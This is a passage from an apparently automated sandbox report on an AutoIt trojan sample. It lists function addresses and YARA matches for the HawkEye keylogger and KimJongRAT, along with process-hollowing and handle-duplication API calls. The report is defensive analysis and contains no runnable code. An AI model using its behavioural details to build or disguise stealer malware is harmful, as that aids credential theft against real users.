Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Code function: 5_2_04B53DF2 5_2_04B53DF2
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Code function: 5_2_04B541D8 5_2_04B541D8
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Code function: 5_2_04B539DA 5_2_04B539DA
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Code function: 5_2_04B545C0 5_2_04B545C0
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Code function: 5_2_04B541C9 5_2_04B541C9
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Code function: 5_2_04B56D30 5_2_04B56D30
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Code function: 5_2_04B5390D 5_2_04B5390D
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Code function: 5_2_04B57508 5_2_04B57508
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Code function: 5_2_04B5D941 5_2_04B5D941
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Code function: 5_2_04B53AB4 5_2_04B53AB4
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Code function: 5_2_04B5D6A0 5_2_04B5D6A0
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Code function: 5_2_04B5369C 5_2_04B5369C
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Code function: 5_2_04B5CA89 5_2_04B5CA89
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Code function: 5_2_04B53AF4 5_2_04B53AF4
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Code function: 5_2_04B57EC1 5_2_04B57EC1
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Code function: 5_2_04B5CACD 5_2_04B5CACD
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Code function: 5_2_04B5DE37 5_2_04B5DE37
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Code function: 5_2_04B53A3A 5_2_04B53A3A
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Code function: 5_2_04B57A20 5_2_04B57A20
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Code function: 5_2_04B56A22 5_2_04B56A22
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Code function: 5_2_04B53218 5_2_04B53218
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Code function: 5_2_04B5361B 5_2_04B5361B
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Code function: 5_2_04B53E00 5_2_04B53E00
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Code function: 5_2_04B53A77 5_2_04B53A77
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Code function: 5_2_04B53671 5_2_04B53671
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Code function: 5_2_04B5CA46 5_2_04B5CA46
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Code function: 5_2_04B537B8 5_2_04B537B8
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Code function: 5_2_04B53B85 5_2_04B53B85
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Code function: 5_2_04B58B80 5_2_04B58B80
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Code function: 5_2_04B53389 5_2_04B53389
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Code function: 5_2_04B5D3F8 5_2_04B5D3F8
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Code function: 5_2_04B537FA 5_2_04B537FA
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Code function: 5_2_04B5D3E8 5_2_04B5D3E8
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Code function: 5_2_04B52730 5_2_04B52730
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Code function: 5_2_04B52721 5_2_04B52721
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Code function: 5_2_04B53711 5_2_04B53711
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Code function: 5_2_04B5DF0C 5_2_04B5DF0C
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Code function: 5_2_04B53B0F 5_2_04B53B0F
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Code function: 5_2_04B53777 5_2_04B53777
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Code function: 5_2_04B55768 5_2_04B55768
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Code function: 5_2_04B53744 5_2_04B53744
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: 6_2_0044900F 6_2_0044900F
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: 6_2_004042EB 6_2_004042EB
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: 6_2_00414281 6_2_00414281
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: 6_2_00410291 6_2_00410291
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: 6_2_004063BB 6_2_004063BB
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: 6_2_00415624 6_2_00415624
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: 6_2_0041668D 6_2_0041668D
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: 6_2_0040477F 6_2_0040477F
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: 6_2_0040487C 6_2_0040487C
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: 6_2_0043589B 6_2_0043589B
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: 6_2_0043BA9D 6_2_0043BA9D
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: 6_2_0043FBD3 6_2_0043FBD3
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: 9_2_0044900F 9_2_0044900F
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: 9_2_004042EB 9_2_004042EB
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: 9_2_00414281 9_2_00414281
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: 9_2_00410291 9_2_00410291
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: 9_2_004063BB 9_2_004063BB
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: 9_2_00415624 9_2_00415624
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: 9_2_0041668D 9_2_0041668D
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: 9_2_0040477F 9_2_0040477F
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: 9_2_0040487C 9_2_0040487C
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: 9_2_0043589B 9_2_0043589B
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: 9_2_0043BA9D 9_2_0043BA9D
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: 9_2_0043FBD3 9_2_0043FBD3
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: 18_2_0044900F 18_2_0044900F
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: 18_2_004042EB 18_2_004042EB
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: 18_2_00414281 18_2_00414281
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: 18_2_00410291 18_2_00410291
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: 18_2_004063BB 18_2_004063BB
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: 18_2_00415624 18_2_00415624
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: 18_2_0041668D 18_2_0041668D
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: 18_2_0040477F 18_2_0040477F
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: 18_2_0040487C 18_2_0040487C
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: 18_2_0043589B 18_2_0043589B
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: 18_2_0043BA9D 18_2_0043BA9D
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: 18_2_0043FBD3 18_2_0043FBD3
PE file contains strange resources
Source: SecuriteInfo.com.Trojan.AutoIt.449.29642.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: SecuriteInfo.com.Trojan.AutoIt.449.29642.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: SecuriteInfo.com.Trojan.AutoIt.449.29642.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Tries to load missing DLLs
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Section loaded: sfc.dll
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Section loaded: security.dll
Uses 32bit PE files
Source: SecuriteInfo.com.Trojan.AutoIt.449.29642.exe Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
Yara signature match
Source: 5.3.RegAsm.exe.427b8f2.1.unpack, type: UNPACKEDPE Matched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
Source: 5.0.RegAsm.exe.700000.0.unpack, type: UNPACKEDPE Matched rule: MAL_HawkEye_Keylogger_Gen_Dec18 date = 2018-12-10, hash1 = b8693e015660d7bd791356b352789b43bf932793457d54beae351cf7a3de4dad, author = Florian Roth, description = Detects HawkEye Keylogger Reborn, reference = https://twitter.com/James_inthe_box/status/1072116224652324870
Source: 5.0.RegAsm.exe.700000.0.unpack, type: UNPACKEDPE Matched rule: SUSP_NET_NAME_ConfuserEx author = Arnim Rupp, description = Detects ConfuserEx packed file, reference = https://github.com/yck1509/ConfuserEx, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2021-01-22, modified = 2021-01-25
Source: 5.0.RegAsm.exe.700000.0.unpack, type: UNPACKEDPE Matched rule: HawkEyev9 author = ditekshen, description = HawkEye v9 Payload, cape_type = HawkEyev9 Payload
Source: 5.2.RegAsm.exe.49b0345.2.raw.unpack, type: UNPACKEDPE Matched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
Source: 5.2.RegAsm.exe.4a0834a.1.unpack, type: UNPACKEDPE Matched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
Source: 5.2.RegAsm.exe.4a0834a.1.raw.unpack, type: UNPACKEDPE Matched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
Source: 1.3.SecuriteInfo.com.Trojan.AutoIt.449.29642.exe.4250000.6.unpack, type: UNPACKEDPE Matched rule: MAL_HawkEye_Keylogger_Gen_Dec18 date = 2018-12-10, hash1 = b8693e015660d7bd791356b352789b43bf932793457d54beae351cf7a3de4dad, author = Florian Roth, description = Detects HawkEye Keylogger Reborn, reference = https://twitter.com/James_inthe_box/status/1072116224652324870
Source: 1.3.SecuriteInfo.com.Trojan.AutoIt.449.29642.exe.4250000.6.unpack, type: UNPACKEDPE Matched rule: SUSP_NET_NAME_ConfuserEx author = Arnim Rupp, description = Detects ConfuserEx packed file, reference = https://github.com/yck1509/ConfuserEx, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2021-01-22, modified = 2021-01-25
Source: 1.3.SecuriteInfo.com.Trojan.AutoIt.449.29642.exe.4250000.6.unpack, type: UNPACKEDPE Matched rule: HawkEyev9 author = ditekshen, description = HawkEye v9 Payload, cape_type = HawkEyev9 Payload
Source: 5.2.RegAsm.exe.49b0000.3.unpack, type: UNPACKEDPE Matched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
Source: 5.0.RegAsm.exe.700000.1.unpack, type: UNPACKEDPE Matched rule: MAL_HawkEye_Keylogger_Gen_Dec18 date = 2018-12-10, hash1 = b8693e015660d7bd791356b352789b43bf932793457d54beae351cf7a3de4dad, author = Florian Roth, description = Detects HawkEye Keylogger Reborn, reference = https://twitter.com/James_inthe_box/status/1072116224652324870
Source: 5.0.RegAsm.exe.700000.1.unpack, type: UNPACKEDPE Matched rule: SUSP_NET_NAME_ConfuserEx author = Arnim Rupp, description = Detects ConfuserEx packed file, reference = https://github.com/yck1509/ConfuserEx, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2021-01-22, modified = 2021-01-25
Source: 5.0.RegAsm.exe.700000.1.unpack, type: UNPACKEDPE Matched rule: HawkEyev9 author = ditekshen, description = HawkEye v9 Payload, cape_type = HawkEyev9 Payload
Source: 5.3.RegAsm.exe.42235a8.2.raw.unpack, type: UNPACKEDPE Matched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
Source: 5.3.RegAsm.exe.427b8f2.1.raw.unpack, type: UNPACKEDPE Matched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
Source: 5.2.RegAsm.exe.700000.0.unpack, type: UNPACKEDPE Matched rule: MAL_HawkEye_Keylogger_Gen_Dec18 date = 2018-12-10, hash1 = b8693e015660d7bd791356b352789b43bf932793457d54beae351cf7a3de4dad, author = Florian Roth, description = Detects HawkEye Keylogger Reborn, reference = https://twitter.com/James_inthe_box/status/1072116224652324870
Source: 5.2.RegAsm.exe.700000.0.unpack, type: UNPACKEDPE Matched rule: SUSP_NET_NAME_ConfuserEx author = Arnim Rupp, description = Detects ConfuserEx packed file, reference = https://github.com/yck1509/ConfuserEx, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2021-01-22, modified = 2021-01-25
Source: 5.2.RegAsm.exe.700000.0.unpack, type: UNPACKEDPE Matched rule: HawkEyev9 author = ditekshen, description = HawkEye v9 Payload, cape_type = HawkEyev9 Payload
Source: 5.3.RegAsm.exe.42235a8.2.unpack, type: UNPACKEDPE Matched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
Source: 5.3.RegAsm.exe.42238ed.0.raw.unpack, type: UNPACKEDPE Matched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
Source: 5.2.RegAsm.exe.49b0000.3.raw.unpack, type: UNPACKEDPE Matched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
Source: 00000005.00000002.932841819.0000000000702000.00000020.00000001.sdmp, type: MEMORY Matched rule: MAL_HawkEye_Keylogger_Gen_Dec18 date = 2018-12-10, hash1 = b8693e015660d7bd791356b352789b43bf932793457d54beae351cf7a3de4dad, author = Florian Roth, description = Detects HawkEye Keylogger Reborn, reference = https://twitter.com/James_inthe_box/status/1072116224652324870
Source: 00000001.00000002.934551459.0000000003152000.00000004.00000001.sdmp, type: MEMORY Matched rule: MAL_HawkEye_Keylogger_Gen_Dec18 date = 2018-12-10, hash1 = b8693e015660d7bd791356b352789b43bf932793457d54beae351cf7a3de4dad, author = Florian Roth, description = Detects HawkEye Keylogger Reborn, reference = https://twitter.com/James_inthe_box/status/1072116224652324870
Source: 00000001.00000002.936778010.0000000004132000.00000004.00000001.sdmp, type: MEMORY Matched rule: MAL_HawkEye_Keylogger_Gen_Dec18 date = 2018-12-10, hash1 = b8693e015660d7bd791356b352789b43bf932793457d54beae351cf7a3de4dad, author = Florian Roth, description = Detects HawkEye Keylogger Reborn, reference = https://twitter.com/James_inthe_box/status/1072116224652324870
Source: 00000005.00000000.698490007.0000000000702000.00000020.00000001.sdmp, type: MEMORY Matched rule: MAL_HawkEye_Keylogger_Gen_Dec18 date = 2018-12-10, hash1 = b8693e015660d7bd791356b352789b43bf932793457d54beae351cf7a3de4dad, author = Florian Roth, description = Detects HawkEye Keylogger Reborn, reference = https://twitter.com/James_inthe_box/status/1072116224652324870
Source: 00000005.00000000.697292626.0000000000702000.00000040.00000001.sdmp, type: MEMORY Matched rule: MAL_HawkEye_Keylogger_Gen_Dec18 date = 2018-12-10, hash1 = b8693e015660d7bd791356b352789b43bf932793457d54beae351cf7a3de4dad, author = Florian Roth, description = Detects HawkEye Keylogger Reborn, reference = https://twitter.com/James_inthe_box/status/1072116224652324870
Source: 00000005.00000002.933574671.00000000029C9000.00000004.00000001.sdmp, type: MEMORY Matched rule: MAL_HawkEye_Keylogger_Gen_Dec18 date = 2018-12-10, hash1 = b8693e015660d7bd791356b352789b43bf932793457d54beae351cf7a3de4dad, author = Florian Roth, description = Detects HawkEye Keylogger Reborn, reference = https://twitter.com/James_inthe_box/status/1072116224652324870
Source: 00000001.00000002.934765521.00000000031EA000.00000004.00000001.sdmp, type: MEMORY Matched rule: MAL_HawkEye_Keylogger_Gen_Dec18 date = 2018-12-10, hash1 = b8693e015660d7bd791356b352789b43bf932793457d54beae351cf7a3de4dad, author = Florian Roth, description = Detects HawkEye Keylogger Reborn, reference = https://twitter.com/James_inthe_box/status/1072116224652324870
Source: 00000001.00000002.934844447.000000000328C000.00000004.00000001.sdmp, type: MEMORY Matched rule: MAL_HawkEye_Keylogger_Gen_Dec18 date = 2018-12-10, hash1 = b8693e015660d7bd791356b352789b43bf932793457d54beae351cf7a3de4dad, author = Florian Roth, description = Detects HawkEye Keylogger Reborn, reference = https://twitter.com/James_inthe_box/status/1072116224652324870
Source: 00000001.00000003.697471372.0000000004252000.00000040.00000001.sdmp, type: MEMORY Matched rule: MAL_HawkEye_Keylogger_Gen_Dec18 date = 2018-12-10, hash1 = b8693e015660d7bd791356b352789b43bf932793457d54beae351cf7a3de4dad, author = Florian Roth, description = Detects HawkEye Keylogger Reborn, reference = https://twitter.com/James_inthe_box/status/1072116224652324870
Source: 00000005.00000002.934824260.00000000049B0000.00000004.00020000.sdmp, type: MEMORY Matched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
Source: Process Memory Space: SecuriteInfo.com.Trojan.AutoIt.449.29642.exe PID: 2228, type: MEMORYSTR Matched rule: MAL_HawkEye_Keylogger_Gen_Dec18 date = 2018-12-10, hash1 = b8693e015660d7bd791356b352789b43bf932793457d54beae351cf7a3de4dad, author = Florian Roth, description = Detects HawkEye Keylogger Reborn, reference = https://twitter.com/James_inthe_box/status/1072116224652324870
Source: Process Memory Space: RegAsm.exe PID: 6872, type: MEMORYSTR Matched rule: MAL_HawkEye_Keylogger_Gen_Dec18 date = 2018-12-10, hash1 = b8693e015660d7bd791356b352789b43bf932793457d54beae351cf7a3de4dad, author = Florian Roth, description = Detects HawkEye Keylogger Reborn, reference = https://twitter.com/James_inthe_box/status/1072116224652324870
Found potential string decryption / allocating functions
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: String function: 0044465C appears 54 times
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: String function: 0044466E appears 60 times
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: String function: 0041557C appears 33 times
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: String function: 00416398 appears 33 times
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: String function: 00415F19 appears 102 times
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: String function: 0044468C appears 108 times
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: String function: 00444B90 appears 108 times
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: String function: 0041607A appears 198 times
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: String function: 0042F6EF appears 48 times
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: String function: 004162C2 appears 261 times
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: String function: 004083D6 appears 96 times
Contains functionality to call native functions
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Code function: 5_2_04B5ACC8 NtUnmapViewOfSection,NtUnmapViewOfSection, 5_2_04B5ACC8
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: 6_2_0040978A memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle, 6_2_0040978A
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: 9_2_0040978A memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle, 9_2_0040978A
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: 18_2_0040978A memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle, 18_2_0040978A
Sample file is different than original file name gathered from version info
Source: SecuriteInfo.com.Trojan.AutoIt.449.29642.exe, 00000001.00000002.934551459.0000000003152000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameReborn Stub.exe" vs SecuriteInfo.com.Trojan.AutoIt.449.29642.exe
Source: SecuriteInfo.com.Trojan.AutoIt.449.29642.exe, 00000001.00000002.936778010.0000000004132000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameReborn Stub.exe" vs SecuriteInfo.com.Trojan.AutoIt.449.29642.exe
Source: SecuriteInfo.com.Trojan.AutoIt.449.29642.exe, 00000001.00000002.936349968.0000000003881000.00000004.00000001.sdmp Binary or memory string: FV_ORIGINALFILENAME vs SecuriteInfo.com.Trojan.AutoIt.449.29642.exe
Source: SecuriteInfo.com.Trojan.AutoIt.449.29642.exe, 00000001.00000002.934765521.00000000031EA000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameReborn Stub.exe" vs SecuriteInfo.com.Trojan.AutoIt.449.29642.exe
Source: SecuriteInfo.com.Trojan.AutoIt.449.29642.exe, 00000001.00000002.934844447.000000000328C000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameReborn Stub.exe" vs SecuriteInfo.com.Trojan.AutoIt.449.29642.exe
Source: SecuriteInfo.com.Trojan.AutoIt.449.29642.exe, 00000001.00000002.933537560.0000000000CFA000.00000004.00000001.sdmp Binary or memory string: Comments|CompanyName|FileDescription|FileVersion|InternalName|LegalCopyright|LegalTrademarks|OriginalFilename|ProductName|ProductVersion|PrivateBuild|SpecialBuild] vs SecuriteInfo.com.Trojan.AutoIt.449.29642.exe
Source: SecuriteInfo.com.Trojan.AutoIt.449.29642.exe, 00000001.00000002.933567035.0000000000D1F000.00000004.00000001.sdmp Binary or memory string: Comments|CompanyName|FileDescription|FileVersion|InternalName|LegalCopyright|LegalTrademarks|OriginalFilename|ProductName|ProductVersion|PrivateBuild|SpecialBuild vs SecuriteInfo.com.Trojan.AutoIt.449.29642.exe
Source: SecuriteInfo.com.Trojan.AutoIt.449.29642.exe, 00000001.00000002.933303003.0000000000BE3000.00000004.00000001.sdmp Binary or memory string: FV_ORIGINALFILENAME vs SecuriteInfo.com.Trojan.AutoIt.449.29642.exe
Source: SecuriteInfo.com.Trojan.AutoIt.449.29642.exe, 00000001.00000002.933303003.0000000000BE3000.00000004.00000001.sdmp Binary or memory string: OriginalFilename vs SecuriteInfo.com.Trojan.AutoIt.449.29642.exe
Source: SecuriteInfo.com.Trojan.AutoIt.449.29642.exe, 00000001.00000003.697471372.0000000004252000.00000040.00000001.sdmp Binary or memory string: OriginalFilenameReborn Stub.exe" vs SecuriteInfo.com.Trojan.AutoIt.449.29642.exe
Source: SecuriteInfo.com.Trojan.AutoIt.449.29642.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@9/7@3/2
Source: 5.0.RegAsm.exe.700000.1.unpack, u202a????????????????????????????????????????.cs Security API names: System.Void Microsoft.Win32.RegistryKey::SetAccessControl(System.Security.AccessControl.RegistrySecurity)
Source: 5.0.RegAsm.exe.700000.1.unpack, u202a????????????????????????????????????????.cs Security API names: System.Security.Principal.IdentityReference System.Security.Principal.SecurityIdentifier::Translate(System.Type)
Source: 5.0.RegAsm.exe.700000.1.unpack, u202a????????????????????????????????????????.cs Security API names: System.Void System.Security.AccessControl.RegistrySecurity::AddAccessRule(System.Security.AccessControl.RegistryAccessRule)
Source: 5.2.RegAsm.exe.700000.0.unpack, u200b????????????????????????????????????????.cs Security API names: System.Void System.IO.DirectoryInfo::SetAccessControl(System.Security.AccessControl.DirectorySecurity)
Source: 5.0.RegAsm.exe.700000.1.unpack, u200d????????????????????????????????????????.cs Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 5.0.RegAsm.exe.700000.1.unpack, u200d????????????????????????????????????????.cs Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 5.0.RegAsm.exe.700000.1.unpack, u200b????????????????????????????????????????.cs Security API names: System.Void System.IO.DirectoryInfo::SetAccessControl(System.Security.AccessControl.DirectorySecurity)
